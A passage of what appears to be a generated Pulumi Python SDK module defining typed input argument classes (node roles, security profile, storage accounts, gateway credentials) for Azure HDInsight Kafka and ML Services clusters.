        return pulumi.get(self, "min_instance_count")

    @min_instance_count.setter
    def min_instance_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "min_instance_count", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """The local administrator password for the Worker Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """SSH Keys for the local administrator on the Worker Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "ssh_keys")

    @ssh_keys.setter
    def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Subnet in which the Worker Nodes are provisioned. Changing this forces a new resource to be created."""
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", value)

    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Virtual Network in which the Worker Nodes are provisioned. Changing this forces a new resource to be created."""
        return pulumi.get(self, "virtual_network_id")

    @virtual_network_id.setter
    def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class KafkaClusterRolesZookeeperNodeArgs:
    def __init__(__self__, *,
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 password: Optional[pulumi.Input[str]] = None,
                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        Zookeeper Node configuration for a Kafka HDInsight cluster.

        :param pulumi.Input[str] username: The local administrator username for the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] vm_size: The Virtual Machine size used for the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The local administrator password for the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: SSH Keys for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] subnet_id: The ID of the Subnet in which the Zookeeper Nodes are provisioned. Changing this forces a new resource to be created.
        :param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network in which the Zookeeper Nodes are provisioned. Changing this forces a new resource to be created.
        """
        # Required settings.
        pulumi.set(__self__, "username", username)
        pulumi.set(__self__, "vm_size", vm_size)
        # Optional settings are only recorded when a value was supplied.
        for _name, _value in (
                ("password", password),
                ("ssh_keys", ssh_keys),
                ("subnet_id", subnet_id),
                ("virtual_network_id", virtual_network_id)):
            if _value is not None:
                pulumi.set(__self__, _name, _value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """The local administrator username for the Zookeeper Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)

    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """The Virtual Machine size used for the Zookeeper Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "vm_size")

    @vm_size.setter
    def vm_size(self, value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """The local administrator password for the Zookeeper Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """SSH Keys for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "ssh_keys")

    @ssh_keys.setter
    def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Subnet in which the Zookeeper Nodes are provisioned. Changing this forces a new resource to be created."""
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", value)

    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Virtual Network in which the Zookeeper Nodes are provisioned. Changing this forces a new resource to be created."""
        return pulumi.get(self, "virtual_network_id")

    @virtual_network_id.setter
    def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class KafkaClusterSecurityProfileArgs:
    def __init__(__self__, *,
                 aadds_resource_id: pulumi.Input[str],
                 domain_name: pulumi.Input[str],
                 domain_user_password: pulumi.Input[str],
                 domain_username: pulumi.Input[str],
                 ldaps_urls: pulumi.Input[Sequence[pulumi.Input[str]]],
                 msi_resource_id: pulumi.Input[str],
                 cluster_users_group_dns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
        """
        Enterprise Security Package (Azure AD DS) settings for a Kafka HDInsight cluster.

        :param pulumi.Input[str] aadds_resource_id: The resource ID of the Azure Active Directory Domain Service. Changing this forces a new resource to be created.
        :param pulumi.Input[str] domain_name: The name of the Azure Active Directory Domain. Changing this forces a new resource to be created.
        :param pulumi.Input[str] domain_user_password: The user password of the Azure Active Directory Domain. Changing this forces a new resource to be created.
        :param pulumi.Input[str] domain_username: The username of the Azure Active Directory Domain. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ldaps_urls: A list of the LDAPS URLs used to communicate with the Azure Active Directory. Changing this forces a new resource to be created.
        :param pulumi.Input[str] msi_resource_id: The User Assigned Identity for the HDInsight Cluster. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] cluster_users_group_dns: A list of the distinguished names for the cluster user groups. Changing this forces a new resource to be created.
        """
        # Required settings.
        for _name, _value in (
                ("aadds_resource_id", aadds_resource_id),
                ("domain_name", domain_name),
                ("domain_user_password", domain_user_password),
                ("domain_username", domain_username),
                ("ldaps_urls", ldaps_urls),
                ("msi_resource_id", msi_resource_id)):
            pulumi.set(__self__, _name, _value)
        # The cluster user groups list is optional.
        if cluster_users_group_dns is not None:
            pulumi.set(__self__, "cluster_users_group_dns", cluster_users_group_dns)

    @property
    @pulumi.getter(name="aaddsResourceId")
    def aadds_resource_id(self) -> pulumi.Input[str]:
        """The resource ID of the Azure Active Directory Domain Service. Changing this forces a new resource to be created."""
        return pulumi.get(self, "aadds_resource_id")

    @aadds_resource_id.setter
    def aadds_resource_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "aadds_resource_id", value)

    @property
    @pulumi.getter(name="domainName")
    def domain_name(self) -> pulumi.Input[str]:
        """The name of the Azure Active Directory Domain. Changing this forces a new resource to be created."""
        return pulumi.get(self, "domain_name")

    @domain_name.setter
    def domain_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "domain_name", value)

    @property
    @pulumi.getter(name="domainUserPassword")
    def domain_user_password(self) -> pulumi.Input[str]:
        """The user password of the Azure Active Directory Domain. Changing this forces a new resource to be created."""
        return pulumi.get(self, "domain_user_password")

    @domain_user_password.setter
    def domain_user_password(self, value: pulumi.Input[str]):
        pulumi.set(self, "domain_user_password", value)

    @property
    @pulumi.getter(name="domainUsername")
    def domain_username(self) -> pulumi.Input[str]:
        """The username of the Azure Active Directory Domain. Changing this forces a new resource to be created."""
        return pulumi.get(self, "domain_username")

    @domain_username.setter
    def domain_username(self, value: pulumi.Input[str]):
        pulumi.set(self, "domain_username", value)

    @property
    @pulumi.getter(name="ldapsUrls")
    def ldaps_urls(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """A list of the LDAPS URLs used to communicate with the Azure Active Directory. Changing this forces a new resource to be created."""
        return pulumi.get(self, "ldaps_urls")

    @ldaps_urls.setter
    def ldaps_urls(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
        pulumi.set(self, "ldaps_urls", value)

    @property
    @pulumi.getter(name="msiResourceId")
    def msi_resource_id(self) -> pulumi.Input[str]:
        """The User Assigned Identity for the HDInsight Cluster. Changing this forces a new resource to be created."""
        return pulumi.get(self, "msi_resource_id")

    @msi_resource_id.setter
    def msi_resource_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "msi_resource_id", value)

    @property
    @pulumi.getter(name="clusterUsersGroupDns")
    def cluster_users_group_dns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """A list of the distinguished names for the cluster user groups. Changing this forces a new resource to be created."""
        return pulumi.get(self, "cluster_users_group_dns")

    @cluster_users_group_dns.setter
    def cluster_users_group_dns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "cluster_users_group_dns", value)
@pulumi.input_type
class KafkaClusterStorageAccountArgs:
    def __init__(__self__, *,
                 is_default: pulumi.Input[bool],
                 storage_account_key: pulumi.Input[str],
                 storage_container_id: pulumi.Input[str]):
        """
        Blob-storage (WASB) account settings for a Kafka HDInsight cluster.

        :param pulumi.Input[bool] is_default: Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created.
        :param pulumi.Input[str] storage_account_key: The Access Key used to connect to the Storage Account. Changing this forces a new resource to be created.
        :param pulumi.Input[str] storage_container_id: The ID of the Storage Container. Changing this forces a new resource to be created.
        """
        # All settings are mandatory, so record them unconditionally.
        for _name, _value in (
                ("is_default", is_default),
                ("storage_account_key", storage_account_key),
                ("storage_container_id", storage_container_id)):
            pulumi.set(__self__, _name, _value)

    @property
    @pulumi.getter(name="isDefault")
    def is_default(self) -> pulumi.Input[bool]:
        """Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created."""
        return pulumi.get(self, "is_default")

    @is_default.setter
    def is_default(self, value: pulumi.Input[bool]):
        pulumi.set(self, "is_default", value)

    @property
    @pulumi.getter(name="storageAccountKey")
    def storage_account_key(self) -> pulumi.Input[str]:
        """The Access Key used to connect to the Storage Account. Changing this forces a new resource to be created."""
        return pulumi.get(self, "storage_account_key")

    @storage_account_key.setter
    def storage_account_key(self, value: pulumi.Input[str]):
        pulumi.set(self, "storage_account_key", value)

    @property
    @pulumi.getter(name="storageContainerId")
    def storage_container_id(self) -> pulumi.Input[str]:
        """The ID of the Storage Container. Changing this forces a new resource to be created."""
        return pulumi.get(self, "storage_container_id")

    @storage_container_id.setter
    def storage_container_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "storage_container_id", value)
@pulumi.input_type
class KafkaClusterStorageAccountGen2Args:
    def __init__(__self__, *,
                 filesystem_id: pulumi.Input[str],
                 is_default: pulumi.Input[bool],
                 managed_identity_resource_id: pulumi.Input[str],
                 storage_resource_id: pulumi.Input[str]):
        """
        Data Lake Storage Gen2 account settings for a Kafka HDInsight cluster.

        :param pulumi.Input[str] filesystem_id: The ID of the Gen2 Filesystem. Changing this forces a new resource to be created.
        :param pulumi.Input[bool] is_default: Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created.
        :param pulumi.Input[str] managed_identity_resource_id: The ID of the Managed Identity used to access the Gen2 filesystem. Changing this forces a new resource to be created.
        :param pulumi.Input[str] storage_resource_id: The ID of the Storage Account. Changing this forces a new resource to be created.
        """
        # All settings are mandatory, so record them unconditionally.
        for _name, _value in (
                ("filesystem_id", filesystem_id),
                ("is_default", is_default),
                ("managed_identity_resource_id", managed_identity_resource_id),
                ("storage_resource_id", storage_resource_id)):
            pulumi.set(__self__, _name, _value)

    @property
    @pulumi.getter(name="filesystemId")
    def filesystem_id(self) -> pulumi.Input[str]:
        """The ID of the Gen2 Filesystem. Changing this forces a new resource to be created."""
        return pulumi.get(self, "filesystem_id")

    @filesystem_id.setter
    def filesystem_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "filesystem_id", value)

    @property
    @pulumi.getter(name="isDefault")
    def is_default(self) -> pulumi.Input[bool]:
        """Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created."""
        return pulumi.get(self, "is_default")

    @is_default.setter
    def is_default(self, value: pulumi.Input[bool]):
        pulumi.set(self, "is_default", value)

    @property
    @pulumi.getter(name="managedIdentityResourceId")
    def managed_identity_resource_id(self) -> pulumi.Input[str]:
        """The ID of the Managed Identity used to access the Gen2 filesystem. Changing this forces a new resource to be created."""
        return pulumi.get(self, "managed_identity_resource_id")

    @managed_identity_resource_id.setter
    def managed_identity_resource_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "managed_identity_resource_id", value)

    @property
    @pulumi.getter(name="storageResourceId")
    def storage_resource_id(self) -> pulumi.Input[str]:
        """The ID of the Storage Account. Changing this forces a new resource to be created."""
        return pulumi.get(self, "storage_resource_id")

    @storage_resource_id.setter
    def storage_resource_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "storage_resource_id", value)
@pulumi.input_type
class MLServicesClusterGatewayArgs:
    def __init__(__self__, *,
                 password: pulumi.Input[str],
                 username: pulumi.Input[str],
                 enabled: Optional[pulumi.Input[bool]] = None):
        """
        Ambari Portal gateway credentials for an MLServices HDInsight cluster.

        :param pulumi.Input[str] password: The password used for the Ambari Portal.
        :param pulumi.Input[str] username: The username used for the Ambari Portal. Changing this forces a new resource to be created.
        :param pulumi.Input[bool] enabled: Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore. Deprecated.
        """
        pulumi.set(__self__, "password", password)
        pulumi.set(__self__, "username", username)
        # `enabled` is deprecated but still recorded when supplied, after warning.
        if enabled is not None:
            warnings.warn("""HDInsight doesn't support disabling gateway anymore""", DeprecationWarning)
            pulumi.log.warn("""enabled is deprecated: HDInsight doesn't support disabling gateway anymore""")
            pulumi.set(__self__, "enabled", enabled)

    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """The password used for the Ambari Portal."""
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: pulumi.Input[str]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """The username used for the Ambari Portal. Changing this forces a new resource to be created."""
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)

    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore."""
        return pulumi.get(self, "enabled")

    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
@pulumi.input_type
class MLServicesClusterRolesArgs:
    def __init__(__self__, *,
                 edge_node: pulumi.Input['MLServicesClusterRolesEdgeNodeArgs'],
                 head_node: pulumi.Input['MLServicesClusterRolesHeadNodeArgs'],
                 worker_node: pulumi.Input['MLServicesClusterRolesWorkerNodeArgs'],
                 zookeeper_node: pulumi.Input['MLServicesClusterRolesZookeeperNodeArgs']):
        """
        The full set of node roles that make up an HDInsight ML Services Cluster.

        :param pulumi.Input['MLServicesClusterRolesEdgeNodeArgs'] edge_node: A `edge_node` block as defined above.
        :param pulumi.Input['MLServicesClusterRolesHeadNodeArgs'] head_node: A `head_node` block as defined above.
        :param pulumi.Input['MLServicesClusterRolesWorkerNodeArgs'] worker_node: A `worker_node` block as defined below.
        :param pulumi.Input['MLServicesClusterRolesZookeeperNodeArgs'] zookeeper_node: A `zookeeper_node` block as defined below.
        """
        # Every role is mandatory, so all four are stored unconditionally.
        role_entries = (
            ("edge_node", edge_node),
            ("head_node", head_node),
            ("worker_node", worker_node),
            ("zookeeper_node", zookeeper_node),
        )
        for role_key, role_args in role_entries:
            pulumi.set(__self__, role_key, role_args)

    @property
    @pulumi.getter(name="edgeNode")
    def edge_node(self) -> pulumi.Input['MLServicesClusterRolesEdgeNodeArgs']:
        """
        The `edge_node` configuration block for this cluster.
        """
        return pulumi.get(self, "edge_node")

    @edge_node.setter
    def edge_node(self, new_value: pulumi.Input['MLServicesClusterRolesEdgeNodeArgs']):
        pulumi.set(self, "edge_node", new_value)

    @property
    @pulumi.getter(name="headNode")
    def head_node(self) -> pulumi.Input['MLServicesClusterRolesHeadNodeArgs']:
        """
        The `head_node` configuration block for this cluster.
        """
        return pulumi.get(self, "head_node")

    @head_node.setter
    def head_node(self, new_value: pulumi.Input['MLServicesClusterRolesHeadNodeArgs']):
        pulumi.set(self, "head_node", new_value)

    @property
    @pulumi.getter(name="workerNode")
    def worker_node(self) -> pulumi.Input['MLServicesClusterRolesWorkerNodeArgs']:
        """
        The `worker_node` configuration block for this cluster.
        """
        return pulumi.get(self, "worker_node")

    @worker_node.setter
    def worker_node(self, new_value: pulumi.Input['MLServicesClusterRolesWorkerNodeArgs']):
        pulumi.set(self, "worker_node", new_value)

    @property
    @pulumi.getter(name="zookeeperNode")
    def zookeeper_node(self) -> pulumi.Input['MLServicesClusterRolesZookeeperNodeArgs']:
        """
        The `zookeeper_node` configuration block for this cluster.
        """
        return pulumi.get(self, "zookeeper_node")

    @zookeeper_node.setter
    def zookeeper_node(self, new_value: pulumi.Input['MLServicesClusterRolesZookeeperNodeArgs']):
        pulumi.set(self, "zookeeper_node", new_value)
@pulumi.input_type
class MLServicesClusterRolesEdgeNodeArgs:
    def __init__(__self__, *,
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 password: Optional[pulumi.Input[str]] = None,
                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        Edge Node configuration for an HDInsight ML Services Cluster.

        All arguments force a new resource to be created when changed.

        :param pulumi.Input[str] username: Local administrator username for the Edge Node.
        :param pulumi.Input[str] vm_size: Virtual Machine size to use for the Edge Node.
        :param pulumi.Input[str] password: Local administrator password for the Edge Node.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: SSH keys for the local administrator on the Edge Node.
        :param pulumi.Input[str] subnet_id: ID of the Subnet in which to provision the Edge Node.
        :param pulumi.Input[str] virtual_network_id: ID of the Virtual Network in which to provision the Edge Node.
        """
        pulumi.set(__self__, "username", username)
        pulumi.set(__self__, "vm_size", vm_size)
        # Optional arguments are only recorded when the caller supplied a value.
        optional_entries = (
            ("password", password),
            ("ssh_keys", ssh_keys),
            ("subnet_id", subnet_id),
            ("virtual_network_id", virtual_network_id),
        )
        for entry_key, entry_value in optional_entries:
            if entry_value is not None:
                pulumi.set(__self__, entry_key, entry_value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        Local administrator username for the Edge Node. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")

    @username.setter
    def username(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "username", new_value)

    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """
        Virtual Machine size to use for the Edge Node. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "vm_size")

    @vm_size.setter
    def vm_size(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", new_value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """
        Local administrator password for the Edge Node. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", new_value)

    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        SSH keys for the local administrator on the Edge Node. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "ssh_keys")

    @ssh_keys.setter
    def ssh_keys(self, new_value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", new_value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """
        ID of the Subnet in which to provision the Edge Node. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", new_value)

    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """
        ID of the Virtual Network in which to provision the Edge Node. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "virtual_network_id")

    @virtual_network_id.setter
    def virtual_network_id(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", new_value)
@pulumi.input_type
class MLServicesClusterRolesHeadNodeArgs:
    def __init__(__self__, *,
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 password: Optional[pulumi.Input[str]] = None,
                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        Head Node configuration for an HDInsight ML Services Cluster.

        All arguments force a new resource to be created when changed.

        :param pulumi.Input[str] username: Local administrator username for the Head Nodes.
        :param pulumi.Input[str] vm_size: Virtual Machine size to use for the Head Nodes.
        :param pulumi.Input[str] password: Local administrator password for the Head Nodes.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: SSH keys for the local administrator on the Head Nodes.
        :param pulumi.Input[str] subnet_id: ID of the Subnet in which to provision the Head Nodes.
        :param pulumi.Input[str] virtual_network_id: ID of the Virtual Network in which to provision the Head Nodes.
        """
        pulumi.set(__self__, "username", username)
        pulumi.set(__self__, "vm_size", vm_size)
        # Optional arguments are only recorded when the caller supplied a value.
        optional_entries = (
            ("password", password),
            ("ssh_keys", ssh_keys),
            ("subnet_id", subnet_id),
            ("virtual_network_id", virtual_network_id),
        )
        for entry_key, entry_value in optional_entries:
            if entry_value is not None:
                pulumi.set(__self__, entry_key, entry_value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        Local administrator username for the Head Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")

    @username.setter
    def username(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "username", new_value)

    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """
        Virtual Machine size to use for the Head Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "vm_size")

    @vm_size.setter
    def vm_size(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", new_value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """
        Local administrator password for the Head Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", new_value)

    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        SSH keys for the local administrator on the Head Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "ssh_keys")

    @ssh_keys.setter
    def ssh_keys(self, new_value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", new_value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """
        ID of the Subnet in which to provision the Head Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", new_value)

    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """
        ID of the Virtual Network in which to provision the Head Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "virtual_network_id")

    @virtual_network_id.setter
    def virtual_network_id(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", new_value)
@pulumi.input_type
class MLServicesClusterRolesWorkerNodeArgs:
    def __init__(__self__, *,
                 target_instance_count: pulumi.Input[int],
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 min_instance_count: Optional[pulumi.Input[int]] = None,
                 password: Optional[pulumi.Input[str]] = None,
                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        Worker Node configuration for an HDInsight ML Services Cluster.

        :param pulumi.Input[int] target_instance_count: The number of instances which should be run for the Worker Nodes.
        :param pulumi.Input[str] username: The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[int] min_instance_count: The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
        :param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "target_instance_count", target_instance_count)
        pulumi.set(__self__, "username", username)
        pulumi.set(__self__, "vm_size", vm_size)
        if min_instance_count is not None:
            # Deprecated argument: warn through both channels, then still record
            # the value for backwards compatibility.
            # (Collapsed the previously duplicated `is not None` check into one branch.)
            warnings.warn("""this has been deprecated from the API and will be removed in version 3.0 of the provider""", DeprecationWarning)
            pulumi.log.warn("""min_instance_count is deprecated: this has been deprecated from the API and will be removed in version 3.0 of the provider""")
            pulumi.set(__self__, "min_instance_count", min_instance_count)
        if password is not None:
            pulumi.set(__self__, "password", password)
        if ssh_keys is not None:
            pulumi.set(__self__, "ssh_keys", ssh_keys)
        if subnet_id is not None:
            pulumi.set(__self__, "subnet_id", subnet_id)
        if virtual_network_id is not None:
            pulumi.set(__self__, "virtual_network_id", virtual_network_id)

    @property
    @pulumi.getter(name="targetInstanceCount")
    def target_instance_count(self) -> pulumi.Input[int]:
        """
        The number of instances which should be run for the Worker Nodes.
        """
        return pulumi.get(self, "target_instance_count")

    @target_instance_count.setter
    def target_instance_count(self, value: pulumi.Input[int]):
        pulumi.set(self, "target_instance_count", value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)

    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """
        The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "vm_size")

    @vm_size.setter
    def vm_size(self, value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", value)

    @property
    @pulumi.getter(name="minInstanceCount")
    def min_instance_count(self) -> Optional[pulumi.Input[int]]:
        """
        The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "min_instance_count")

    @min_instance_count.setter
    def min_instance_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "min_instance_count", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """
        The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "ssh_keys")

    @ssh_keys.setter
    def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", value)

    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "virtual_network_id")

    @virtual_network_id.setter
    def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class MLServicesClusterRolesZookeeperNodeArgs:
    def __init__(__self__, *,
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 password: Optional[pulumi.Input[str]] = None,
